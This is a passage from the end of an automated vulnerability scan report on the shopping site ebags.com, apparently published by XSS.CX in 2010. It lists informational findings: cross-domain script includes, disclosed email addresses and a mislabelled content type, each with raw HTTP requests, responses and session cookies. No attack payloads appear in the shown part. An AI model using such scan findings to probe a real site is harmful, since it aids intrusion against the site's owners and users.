http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /info/Compare/index.cfm?fuseaction=chart&similarchart=120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

5.43. http://www.ebags.com/info/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

Response

5.44. http://www.ebags.com/members/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/members/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /members/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.45. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js

Request

Response

5.46. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js

Request

Response

5.47. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js

Request

Response

5.48. http://www.ebags.com/rewards/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/rewards/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /rewards/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

5.49. http://www.ebags.com/shoppingcart/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

Response

5.50. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:54 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:54 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.51. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

6. Email addresses disclosed previous next
There are 2 instances of this issue:

/info/index.cfm
/products/view/ZoomColorsViews.cfm

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

6.1. http://www.ebags.com/info/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/index.cfm

Issue detail

The following email address was disclosed in the response:

name@domain.com

Request

GET /info/index.cfm?fuseaction=AlertMe_info_Insert&destination=none&brandid=202&email= HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:06 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=%00728AB%20A%3DB%20F28F1F31AC3; expires=Sun, 02-Jan-2011 14:19:06 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 1543

<script language="JavaScript">
alert("You have entered an invalid email address. Please re-enter your email address (example: name@domain.com).");
</script>

<!-- SiteCatalyst code version: H.
...[SNIP]...

6.2. http://www.ebags.com/products/view/ZoomColorsViews.cfm previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/view/ZoomColorsViews.cfm

Issue detail

The following email address was disclosed in the response:

info@ebags.com

Request

Response

7. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ebags.com
Path:	/w3c/p3p.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain HTML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /w3c/p3p.xml HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Content-Length: 269
Content-Type: text/xml
Last-Modified: Mon, 26 Jan 2009 16:59:06 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 26 Dec 2010 14:02:11 GMT
Connection: close

<META xmlns="http://www.w3.org/2000/12/P3Pv1">
<POLICY-REFERENCES>
<POLICY-REF about="/w3c/eBags_Full_Policy.xml">
<INCLUDE>\*</INCLUDE>
<COOKIE-INCLUDE name="*" value="*" domai
...[SNIP]...

Report generated by XSS.CX at Mon Dec 27 10:36:19 CST 2010.

ebags.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in ebags.com | Vulnerability Crawler Report

Contents

Contents

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail